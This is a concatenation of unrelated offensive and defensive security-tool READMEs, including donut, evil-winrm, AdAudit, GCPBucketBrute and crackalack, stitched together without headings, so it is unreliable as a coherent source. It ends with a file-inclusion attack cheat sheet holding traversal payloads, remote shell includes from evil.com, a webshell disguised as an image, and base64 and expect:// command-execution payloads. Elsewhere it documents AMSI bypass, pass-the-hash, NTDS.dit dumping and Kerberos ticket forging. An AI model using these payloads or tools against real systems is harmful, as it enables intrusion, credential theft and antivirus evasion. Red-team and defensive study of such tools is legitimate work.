usage: donut [options] -f <EXE/DLL/VBS/JS>

                   -MODULE OPTIONS-

       -f <path>            .NET assembly, EXE, DLL, VBS, JS file to execute in-memory.
       -n <name>            Module name. Randomly generated by default.
       -u <URL>             HTTP server that will host the donut module.

                   -PIC/SHELLCODE OPTIONS-

       -a <arch>            Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
       -b <level>           Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
       -o <loader>          Output file. Default is "loader.bin"
       -e                   Encode output file with Base64. (Will be copied to clipboard on Windows)
       -t                   Run entrypoint for unmanaged EXE as a new thread. (replaces ExitProcess with ExitThread in IAT)
       -x                   Call RtlExitUserPr   ocess to terminate the host process. (RtlExitUserThread is called by default)

                   -DOTNET OPTIONS-

       -c <namespace.class> Optional class name.  (required for .NET DLL)
       -m <method | api>    Optional method or API name for DLL. (a method is required for .NET DLL)
       -p <parameters>      Optional parameters inside quotations.
       -r <version>         CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
       -d <name>            AppDomain name to create for .NET. Randomly generated by default.

 examples:

    donut -f c2.dll
    donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
    donut -f loader.dll -c TestClass -m RunProcess -p"calc notepad" -u http://remote_server.com/modules/

• v0.9.2, Bear Claw: https://github.com/TheWover/donut/releases/tag/v0.9.2
• v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
• v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
• v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9

git clone http://github.com/thewover/donut
cd donut

make
make clean
make debug

nmake -f Makefile.msvc
nmake clean -f Makefile.msvc
nmake debug -f Makefile.msvc

pip install .

pip install donut-shellcode

nmake clean -f Makefile.msvc
nmake -f Makefile.msvc

nmake clean -f Makefile.msvc
nmake x86 -f Makefile.msvc

make clean -f Makefile.mingw
make -f Makefile.mingw

• AMSI in .NET v4.8
• Device Guard policy preventing dynamicly generated code from executing

• Add environmental keying
• Make donut polymorphic by obfuscating loader every time shellcode is generated
• Integrate donut as a module into your favorite RAT/C2 Framework

• No, we will not update donut to counter signatures or detections by any AV.
• We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.

• donut.c: The source code for the donut loader generator.
• donut.exe: The compiled loader generator as an EXE.
• donut.py: The donut loader generator as a Python script (planned for version 1.0)
• donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
• setup.py: The setup file for installing Donut as a Pip Python3 module.
• lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform.
• lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform.
• lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project.
• loader/loader.c: Main file for the shellcode.
• loader/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
• loader/inmem_pe.c: In-Memory loader for EXE/DLL files.
• loader/inmem_script.c: In-Memory loader for VBScript/JScript files.
• loader/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
• loader/wscript.c: Supports a number of WScript methods that cscript/wscript support.
• loader/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).
• loader/http_client.c: Downloads a module from remote staging server into memory.
• loader/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
• loader/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
• loader/inject.exe: The compiled C shellcode injector.
• loader/inject.c: A C shellcode injector that injects loader.bin into a specified process for testing.
• loader/runsc.c: A C shellcode runner for testing loader.bin in the simplest manner possible.
• loader/runsc.exe: The compiled C shellcode runner.
• loader/exe2h/exe2h.c: Source code for exe2h.
• loader/exe2h/exe2h.exe: Extracts the useful machine code from loader.exe and saves as array to C header file.
• encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
• hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.

• DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
• DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
• ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
• ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.

• Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.
• Create a C# version of the generator.
• Create a donut.py generator that uses the same command-line parameters as donut.exe.
• Add support for HTTP proxies. * Find ways to simplify the shellcode if possible.
• Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design loaders that work with it.
• Dynamic Calls to DLL functions.
• Handle the ProcessExit event from AppDomain using unmanaged code.

• Emulate a (32 bit) PE binary
• Inspect the memory of the emulated process
• Read the process state
• Display a disassembly of the executed code
• Emulate functions in a managed language (C# || F#)

• Sojobo - Yet another binary analysis framework

• Network discovery
• More sophisticated version detection
• Vulnerability detection
• Backdoor detection
• Vulnerability exploitation

• check the communication to the target hosts by cheking icmp requests
• takes as input a protocol name such as http and executes all nse scripts related to that protocol
• if any vulnerability triggers it saves the output into a log file
• it may perform all of the above actions for a range of IP addresses

• https://nmap.org/book/nse.html
• https://nmap.org/nsedoc/

• Efficiency updates were made to the code improving flow, cleaning up bugs, and providing performance improvements.
• Cleaned up the output directory structure
• Removed TZworks tools from toolset avoiding licensing issues
• Added commandline arguments for new functionality (run "DFIRtriage --help" for details)

• memory is now acquired by default
• argument required to bypass memory acquisition
• free space check conducted prior to acquiring memory
• updated acquisition process to avoid Windows 10 crashes

• windowsupdate.log file
• Windows Defender scan logs
• PowerShell command history
• HOSTS files
• netstat output now includes associated PID for all network connections
• logging all users currently logged in to the target machine to the Triage_info.txt file
• Pulling dozens of new events from the Windows Event logs

• Conducts keyword search across DFIRtriage output data and writes findings to log file
• The search tool is a separate executable (dtfind.exe)
• Double-click to run or run from the command line (eg. dtfind -kw badstuff.php)

• DFIRtriage.exe
  • compiled executable
• .\data\core.ir
  • tool set repository (required for Python version only)
• manifest.txt
  • file hashes for core components
• unlicense.txt
  • copy of license agreement
• source directory
  • DFIRtriage-v4-pub.py
• dtfind.exe
  • compiled search tool executable

1. Map a network drive and authenticate with an account that has local administrative privileges on the target host.

You can used this mapped connection to copy DFIRtriage to the target.

2. We can now shovel a remote shell to the target host using PSEXEC.
   psexec \target_host cmd
   
3. You now have a remote shell on the target. All commands executed at this point are done so on the target host.
   

1. Once the remote shell has been established on the target you can change directory to the location of the extracted DFIRtriage.exe file and execute.
   
2. Memory acquisition occurs by default, no arguments needed. To bypass memory acquisition, the "--nomem" argument can be passed.
   
3. DFIRtriage must be executed with Administrative privileges.
   

• Memory Raw --> image acquisition (optional)
  
• Prefetch --> Collects all prefetch files an parses into a report
  
• PowerShell command history --> Gathers PowerShell command history for all users
  
• User activity --> HTML report of recent user activity
  
• File hash --> MD5 hash of all files in root of System32
  
• Network information --> Network configuration, routing tables, etc
  
• Network connections --> Established network connections
  
• DNS cache entries --> List of complete DNS cache contents
  
• ARP table information --> List of complete ARP cache contents
  
• NetBIOS information --> Active NetBIOS sessions, transferred files, etc
  
• Windows Update Log --> Gathers event tracelog information and builds Windows update log
  
• Windows Defender Scanlog --> Gathers event tracelog information and builds Windows update log
  
• Windows Event Logs --> Gathers and parses Windows Event Logs
  
• Process information --> Processes, PID, and image path
  
• List of remotely opened files --> Files on target system opened by remote hosts
  
• Local user account names --> List of local user accounts
  
• List of hidden directories --> List of all hidden directories on the system partition
  
• Alternate Data Streams --> List of files containing alternate data streams
  
• Complete file listing --> Full list of all files on the system partition
  
• List of scheduled tasks --> List of all configured scheduled tasks
  
• Hash of all collected data --> MD5 hash of all data collected by DFIRtriage
  
• Installed software --> List of all installed software through WMI
  
• Autorun information --> All autorun locations and content
  
• Logged on users --> All users currently logged on to target system
  
• Registry hives --> Copy of all registry hives
  
• USB artifacts --> Collects data needed to parse USB usage info
  
• Browser History --> browser history collection from multiple browsers
  

Jo Van Bulck, Frank Piessens, and Raoul Strackx. 2017. SGX-Step: A Practical Attack Framework for Precise Enclave Execution Control. In Proceedings of the 2nd Workshop on System Software for Trusted Execution (SysTEX '17).

1. The local APIC timer interrupt arrives within an enclaved instruction.
2. The processor executes the AEX procedure that securely stores execution context in the enclave’s SSA frame, initializes CPU registers, and vectors to the (user space) interrupt handler registered in the IDT.
3. At this point, any attack-specific, spy code can easily be plugged in.
4. The library returns to the user space AEP trampoline. We modified the untrusted runtime of the official SGX SDK to allow easy registration of a custom AEP stub. Furthermore, to enable precise evaluation of our approach on attacker-controlled benchmark debug enclaves, SGX-Step can optionally be instrumented to retrieve the stored instruction pointer from the interrupted enclave’s SSA frame. For this, our /dev/sgx-step driver offers an optional IOCTL call for the privileged EDBGRD instruction.
5. Thereafter, we configure the local APIC timer for the next interrupt by writing into the initial-count MMIO register, just before executing (6) ERESUME.

$ sudo vim /etc/default/grub
  # GRUB_CMDLINE_LINUX_DEFAULT="quiet splash nox2apic iomem=relaxed no_timer_check isolcpus=1"
$ sudo update-grub && sudo reboot

$ git submodule init
$ git submodule update
$ ./install_SGX_driver.sh # tested on Ubuntu 16.04
$ ./patch_sdk.sh
$ ./install_SGX_SDK.sh    # tested on Ubuntu 16.04

$ cd kernel
$ make clean load

$ cd app/bench
$ NUM=100 STRLEN=1 make parse   # alternatively vary NUM and use BENCH=1 or ZIGZAG=1
$ # (above command defaults to the Dell Inspiron 13 7359 evaluation laptop machine;
$ # use DESKTOP=1 to build for a Dell Optiplex 7040 machine)
$ # use SGX_SDK=/home/jo/sgxsdk/ for a local SDK installation
$ # use M32=1 To produce a 32-bit executable

$ cd my/git/project
$ git submodule add git@github.com:jovanbulck/sgx-step.git
$ cd sgx-step # Now build `/dev/sgx-step` and `libsgxstep` as described above

_____ ____     _____       _ _ _
|  _  |    \   |  _  |_ _ _| |_| |_
|     |  |  |  |     | | | . | |  _|
|__|__|____/   |__|__|___|___|_|_|
                 by phillips321

• Device Information
  • Get-HostDetails
• Domain Audit
  • Get-MachineAccountQuota
  • Get-SMB1Support
  • Get-FunctionalLevel
  • Get-DCsNotOwnedByDA
• Domain Trust Audit
  • Get-DomainTrusts
• User Accounts Audit
  • Get-InactiveAccounts
  • Get-DisabledAccounts
  • Get-AdminAccountChecks
  • Get-NULLSessions
  • Get-AdminSDHolders
  • Get-ProtectedUsers
• Password Information Audit
  • Get-AccountPassDontExpire
  • Get-UserPasswordNotChangedRecently
  • Get-PasswordPolicy
• Dumps NTDS.dit
  • Get-NTDSdit
• Computer Objects Audit
  • Get-OldBoxes
• GPO audit (and checking SYSVOL for passwords)
  • Get-GPOtoFile
  • Get-GPOsPerOU
  • Get-SYSVOLXMLS
• Check Generic Group AD Permissions
  • Get-OUPerms
• Check For Existence of LAPS in domain
  • Get-LAPSStatus
• Check For Existence of Authentication Polices and Silos
  • Get-AuthenticationPoliciesAndSilos

• -hostdetails retrieves hostname and other useful audit info
• -domainaudit retrieves information about the AD such as functional level
• -trusts retrieves information about any doman trusts
• -accounts identifies account issues such as expired, disabled, etc...
• -passwordpolicy retrieves password policy information
• -ntds dumps the NTDS.dit file using ntdsutil
• -oldboxes identified outdated OSs like XP/2003 joined to the domain
• -gpo dumps the GPOs in XML and HTML for later analysis
• -ouperms checks generic OU permission issues
• -laps checks if LAPS is installed
• -authpolsilos checks for existenece of authentication policies and silos
• -all runs all checks, e.g. AdAudit.ps1 -all

• Hard to install/configure/maintain
• Need to pay for added features (enterprise licenses)
• Too much information
  • This boils down to there being so much stuff to do to create new indicators or trying to cram a ton of functions inside the app.

cd threat_note
pip install -r requirements.txt
honcho start

sudo docker build -t threat_note .
sudo docker run -itd -p 8888:8888 threat_note

• This script (optionally) accepts GCP user/service account credentials and a keyword.
• Then, a list of permutations will be generated from that keyword which will then be used to scan for the existence of Google Storage buckets with those names.
• If credentials are supplied, the majority of enumeration will still be performed while unauthenticated, but for any bucket that is discovered via unauthenticated enumeration, it will attempt to enumerate the bucket permissions using the TestIamPermissions API with the supplied credentials. This will help find buckets that are accessible while authenticated, but not while unauthenticated.
• Regardless if credentials are supplied or not, the script will then try to enumerate the bucket permissions using the TestIamPermissions API while unauthenticated. This means that if you don't enter credentials, you will only be shown the privileges an unauthenticated user has, but if you do enter credentials, you will see what access authenticated users have compared to unauthenticated users.
• WARNING: If credentials are supplied, your username can be disclosed in the access logs of any buckets you discover.

• Given a keyword, this script enumerates Google Storage buckets based on a number of permutations generated from the keyword.
• Then, any discovered bucket will be output.
• Then, any permissions that you are granted (if any) to any discovered bucket will be output.
• Then the script will check those privileges for privilege escalation (storage.buckets.setIamPolicy) and will output anything interesting (such as publicly listable, publicly writable, authenticated listable, privilege escalation, etc).

• Linux/OS X
  • Windows only works for unauthenticated scans. Something is wrong with how the script uses the subprocess module in that it fails when using an authenticated Google client.
• Python3
• Pip3

1. git clone https://github.com/RhinoSecurityLabs/GCPBucketBrute.git
2. cd GCPBucketBrute/
3. pip3 install -r requirements.txt or python3 -m pip install -r requirements.txt

• Scan for buckets using the keyword "test" while completely unauthenticated:

python3 gcpbucketbrute.py -k test -u

• Scan for buckets using the keyword "test" while authenticating with a service account (private key stored at ../sa-priv-key.pem), outputting results to out.txt in the current directory:

python3 gcpbucketbrute.py -k test -f ../sa-priv-key.pem -o ./out.txt

• Scan for buckets using the keyword "test", using a user account access token, running with 10 subprocesses instead of 5:

python3 gcpbucketbrute.py -k test -s 10

• -k/--keyword
  • This argument is used to specify what keyword will be used to generate permutations with. Those permutations are what will be searched for in Google Storage.
• --check-single
  • This argument is mutually exclusive with -k/--keyword and accepts a single string. It allows you to check your permissions on a single bucket, rather than generating a list of permutations based on a keyword. Credit: @BBerastegui
• -s/--subprocesses
  • This argument specifies how many subprocesses will be used for bucket enumeration. The default is 5 and the higher you set this value, the faster enumeration will be, but your requests-per-second to Google will increase. These are essentially threads, but the script uses subprocesses instead of threads for parallel execution.
• -f/--service-account-credential-file-path
  • This argument is where you specify the path to the private key file of the GCP service account you want to use to authenticate to Google Storage with. This is optional. If you want to use an access token instead, omit this argument and you will be prompted for the token so it is not saved to your command line history. More information here: https://google-auth.readthedocs.io/en/latest/user-guide.html#service-account-private-key-files and here: https://google-auth.readthedocs.io/en/latest/user-guide.html#user-credentials
• -u/--unauthenticated
  • This argument forces unauthenticated enumeration. With this flag, you will not be prompted for credentials and valid buckets will not be checked for authenticated permissions.
• -o/--out-file
  • This argument allows you to specify a (relative or absolute) file path to a log file to output the results to. The file will be created if it does not already exist and it will be appended to if it does already exist.

• Natural directed graph representation of netlist elements and their connections
• Support for custom gate libraries
• High performance thanks to optimized C++ core
• Modularity: write your own C++ Plugins for efficient netlist analysis and manipulation (e.g. via graph algorithms)
• A feature-rich GUI allowing for visual netlist inspection and interactive analysis
• An integrated Python shell to exploratively interact with netlist elements and to interface plugins from the GUI
• Update v1.1.0 Support for Xilinx Unisim, Xilinx Simprim, Synopsys 90nm, GSCLIB 3.0 and UMC 0.18µm libraries is now added

from hal_plugins import libquine_mccluskey

qm_plugin = libquine_mccluskey.quine_mccluskey()

for gate in netlist.get_gates():
    if "LUT" in gate.type:
        print(gate.name + " (id "+str(gate.id) + ", type " + gate.type + ")")
        print("  " + str(len(gate.input_pin_types)) + "-to-" + str(len(gate.output_pin_types)) + " LUT")
        boolean_functions = qm_plugin.get_boolean_function_str(gate, False)
        for pin in boolean_functions:
            print("  " + pin + ": "+boolean_functions[pin])
        print("")

FSM_sequential_STATE_REG_1_i_2_inst (id 5, type LUT6)    6-to-1 LUT    O: (~I0 I1 ~I2 I3 I4 ~I5) + (I0 ~I2 I3 I4 I5)    FSM_sequential_STATE_REG_0_i_2_inst (id 3, type LUT6)    6-to-1 LUT    O: (I2 I3 I4 ~I5) + (I1 I2) + (I0 I1) + (I1 ~I3) + (I1 ~I4) + (I1 ~I5)    FSM_sequential_STATE_REG_0_i_3_inst (id 4, type LUT6)    6-to-1 LUT    O: (~I1 ~I2 I3 ~I4 I5) + (I0 I5) + (I0 I4) + (I0 I3) + (I0 I1) + (I0 ~I2)    OUTPUT_BUF_0_inst_i_1_inst (id 18, type LUT1)    1-to-1 LUT    O: (~I0)    OUTPUT_BUF_1_inst_i_1_inst (id 20, type LUT2)    2-to-1 LUT    O: (~I0 I1) + (I0 ~I1)    FSM_sequential_STATE_REG_1_i_3_inst (id 6, type LUT6)    6-to-1 LUT    O: (I0 I2 I4) + (~I1 I2 I4) + (I0 ~I3 I4) + (~I1 ~I3 I4) + (I0 I4 ~I5) + (~I1 I4 ~I5) + (I2 I5) + (I2 I3) + (I1 I5) + (I1 I3) + (I0 I1) + (~I0 I5) + (~I0 I3) + (~I0 ~I1) + (I1 ~I2) + (~I0 ~I2) + (~I3 I5) + (~I2 ~I3) + (~I4 I5) + (I3 ~I4) + (I1 ~I4)  

FSM_sequential_STATE_REG_1_i_2_inst (id 5, type LUT6)
  6-to-1 LUT
  O: (~I0 I1 ~I2 I3 I4 ~I5) + (I0 ~I2 I3 I4 I5)

FSM_sequential_STATE_REG_0_i_2_inst (id 3, type LUT6)
  6-to-1 LUT
  O: (I2 I3 I4 ~I5) + (I1 I2) + (I0 I1) + (I1 ~I3) + (I1 ~I4) + (I1 ~I5)

FSM_sequential_STATE_REG_0_i_3_inst (id 4, type LUT6)
  6-to-1 LUT
  O: (~I1 ~I2 I3 ~I4 I5) + (I0 I5) + (I0 I4) + (I0 I3) + (I0 I1) + (I0 ~I2)

OUTPUT_BUF_0_inst_i_1_inst (id 18, type LUT1)
  1-to-1 LUT
  O: (~I0)

OUTPUT_BUF_1_inst_i_1_inst (id 20, type LUT2)
  2-to-1 LUT
  O: (~I0 I1) + (I0 ~I1)

FSM_sequential_STATE_REG_1_i_3_inst (id 6, type LUT6)
  6-to-1 LUT
  O: (I0 I2 I4) + (~I1 I2 I4) + (I0 ~I3 I4) + (~I1 ~I3 I4) + (I0 I4 ~I5) + (~I1 I4 ~I5) + (I2 I5) + (I2 I3) + (I1 I5) + (I1 I3) + (I0 I1) + (~I0 I5) + (~I0 I3) + (~I0 ~I1) + (I1 ~I2) + (~I0 ~I2) + (~I3 I5) + (~I2 ~I3) + (~I4 I5) + (I3 ~I4) + (I1 ~I4)

@misc{hal,
    author = {{EmSec Chair for Embedded Security}},
    publisher = {{Ruhr University Bochum}},
    title = {{HAL - The Hardware Analyzer}},
    year = {2019},
    howpublished = {\url{https://github.com/emsec/hal}},
}

@article{2018:Fyrbiak:HAL,
      author    = {Marc Fyrbiak and
                   Sebastian Wallat and
                   Pawel Swierczynski and
                   Max Hoffmann and
                   Sebastian Hoppach and
                   Matthias Wilhelm and
                   Tobias Weidlich and
                   Russell Tessier and
                   Christof Paar},
  title      = {{HAL-} The Missing Piece of the Puzzle for Hardware Reverse Engineering,
                  Trojan Detection and Insertion},
  journal = {IEEE Transactions on Dependable and Secure Computing},
  year  = {2018},
  publisher = {IEEE},
  howpublished  = {\url{https://github.com/emsec/hal}}
}

sudo -u cacti php -q cli/upgrade_database.php --forcever=`cat include/cacti_version`

update version set cacti = '1.1.38';

• Remote and local data collectors
  
• Device discovery
  
• Automation of device and graph creation
  
• Graph and device templating
  
• Custom data collection methods
  
• User, group and domain access controls
  

• PHP 5.4+
  
• MySQL 5.1+
  
• RRDtool 1.3+, 1.5+ recommended
  
• NET-SNMP 5.5+
  
• Web Server with PHP support
  

• Multiple definable network discovery rules
  
• Automation templates that specify how devices are configured
  

• Dynamically loaded tree and graph view
  
• Searching by string, graph and template types
  
• Viewing augmentation
  
• Simple time span adjustments
  
• Convenient sliding time window buttons
  
• Single click realtime graph option
  
• Easy graph export to csv
  
• RRA view with just a click
  

• Full right axis
  
• Shift
  
• Dash and dash offset
  
• Alt y-grid
  
• No grid fit
  
• Units length
  
• Tab width
  
• Dynamic labels
  
• Rules legend
  
• Legend position
  

• VDEFs
  
• Stacked lines
  
• User definable line widths
  
• Text alignment

• go get github.com/tismayil/rsdl
• clone repo and build ( go build rsdl.go )

• GO Spinner : github.com/briandowns/spinner - [ go get github.com/briandowns/spinner ]
• GO Ping : github.com/sparrc/go-ping - [ go get github.com/sparrc/go-ping ]

• nmap (tool)
• zmap (tool)

git clone https://github.com/zerobyte-id/NetAss2.git

cd NetAss2

sudo chmod +x install.bash

sudo ./install.bash

netass2

- HOST DISCOVERY
- PORT SCAN ON SINGLE HOST
- MASSIVE PORT SCAN VIA DISCOVERED HOSTS
- MASSIVE PORT SCAN VIA LIST ON FILE
- SINGLE PORT QUICK SCAN VIA NETWORK BLOCK
- MULTIPLE PORT QUICK SCAN VIA NETWORK BLOCK
- SHOW REPORTS

• Setup the python environment by providing the jython.jar file in the 'Options' tab under 'Extender' in Burp Suite.
• Download the extension.
• In the 'Extensions' tab under 'Extender', select 'Add'.
• Change the extension type to 'Python'.
• Provide the path of the file ‘Asset_Discover.py’ and click on 'Next'.

• Add a URL to the 'Scope' under the 'Target' tab. The extension will start identifying assets through passive scan.

• Jython 2.7.0
• Burp Suite Pro v2.1

• OpenSecurityResearch CustomPassiveScanner
• PortSwigger example-scanner-checks

# ./crackalack_gen ntlm ascii-32-95 9 9 0 803000 67108864 0

# ./crackalack_lookup /export/ntlm8_tables/ /home/user/hashes.txt

• v1.0: June 11, 2019: Initial revision.
• v1.1: August 8, 2019: massive speed improvements (credit Steve Thomas), finalization of NTLM9 spec, bugfixes.

# apt install mingw-w64 opencl-headers

# make clean; ./make_windows.sh

• Load in memory Powershell scripts
• Load in memory dll files bypassing some AVs
• Load in memory C# (C Sharp) assemblies bypassing some AVs
• Load x64 payloads generated with awesome donut technique
• AMSI Bypass
• Pass-the-hash support
• Kerberos auth support
• SSL and certificates support
• Upload and download files
• List remote machine services without privileges
• Command History
• WinRM command completion
• Local files completion
• Colorization on output messages (can be disabled optionally)

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname (required)
    -U, --url URL                    Remote url endpoint (default wsman)
    -u, --user USER                  Username    (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash NTHash                NTHash 
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -h, --help                       Display this help message

• Step 1. Install it (it will install automatically dependencies): gem install evil-winrm
• Step 2. Ready. Just launch it! ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

• Step 1. Install dependencies manually: ~$ sudo gem install winrm winrm-fs colorize stringio
• Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
• Step 3. Ready. Just launch it! ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

• Step 1. Install bundler: gem install bundler:2.0.2
• Step 2. Install dependencies with bundler: cd evil-winrm && bundle install --path vendor/bundle
• Step 3. Launch it with bundler: bundle exec evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

• upload: local files can be auto-completed using tab key.
  • usage: upload local_filename or upload local_filename destination_filename
• download:
  • usage: download remote_filename or download remote_filename destination_filename

• services: list all services. No administrator permissions needed.
  
• menu: load the Invoke-Binary, l04d3r-LoadDll, Donut-Loader and Bypass-4MSI functions that we will explain below. When a ps1 is loaded all its functions will be shown up.
  

• To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions. Very large files can take a long time to be loaded.
  

• Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.
  

• l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))
  The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.

•  Donut-Loader: allows to inject x64 payloads generated with awesome donut technique. No need to encode the payload.bin, just generate and inject!

• You can use this donut-maker to generate the payload.bin if you don't use Windows. This script use a python module written by Marcello Salvati (byt3bl33d3r). It could be installed using pip:
• pip3 install donut-shellcode
  

• Bypass-4MSI: patchs AMSI protection.
  

• First you have to sync date with the DC: rdate -n <dc_ip>
  
• To generate ticket there are many ways:
  
  • Using ticketer.py from impacket:
    ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
    
  • If you get a kirbi ticket using Rubeus or Mimikatz you have to convert to ccache using ticket_converter.py:
    python ticket_converter.py ticket.kirbi ticket.ccache
    
• Add ccache ticket. There are 2 ways:
  export KRB5CCNAME=/foo/var/ticket.ccache
cp ticket.ccache /tmp/krb5cc_0
  
• Add realm to /etc/krb5.conf (for linux). Use of this format is important:
  

   CONTOSO.COM = {
               kdc = fooserver.contoso.con
   }

• Check Kerberos tickets with klist
  
• To remove ticket use: kdestroy
  
• For more information about Kerberos check this cheatsheet
  

• To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false

• cybervaca

• OscarAkaElvis
• jarilaos
• vis0r

• Alamot for his original code.
• 3v4Si0N for his awesome dll loader.
• WinRb All contributors of ruby library.
• TheWover for his awesome donut tool.
• byt3bl33d3r for his python library to create donut payloads.
• Sh11td0wn for inspiration about new features.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

http: //localhost/index.php? page = files.php

http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

http: //localhost/index.php? page = http: //google.com/

<? Php
passthru ($ _ GET [cmd]);
?>

http: //localhost/index.php? page = http: //someevilhost.com/test.php

http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>

<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php   

http://example.com/index.php?page=zip://shell.jpg%23payload.php

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

1. Upload a lot of shells (for example : 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)

http://example.com/index.php?page=path/to/uploaded/file.png

go get -u github.com/jaeles-project/jaeles

jaeles scan -u http://example.com

jaeles scan -s signatures/common/phpdebug.yaml -U /tmp/list_of_urls.txt

jaeles scan --retry 3 --verbose -s "signatures/cves/jira-*" -U /tmp/list_of_urls.txt

jaeles --verbose server -s sqli

• React components is powered by Carbon and carbon-tutorial.
  
• Awesomes artworks are powered by Freepik at flaticon.com.

• Detect cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
• Target informations gatherings
• Target Subdomains gathering
• Multi-threading on demand
• Checks for vulnerabilities
• Auto shell injector
• Exploit dork searcher
• Ports Scan High Level
• Dns-Servers Dump
• Input multiple target to scan.
• Dorks Listing by Name& by ExploitName.
• Export multiple target from Dorks into a logfile.

• Com Jce
• Com Jwallpapers
• Com Jdownloads
• Com Jdownloads2
• Com Weblinks
• Com Fabrik
• Com Fabrik2
• Com Jdownloads Index
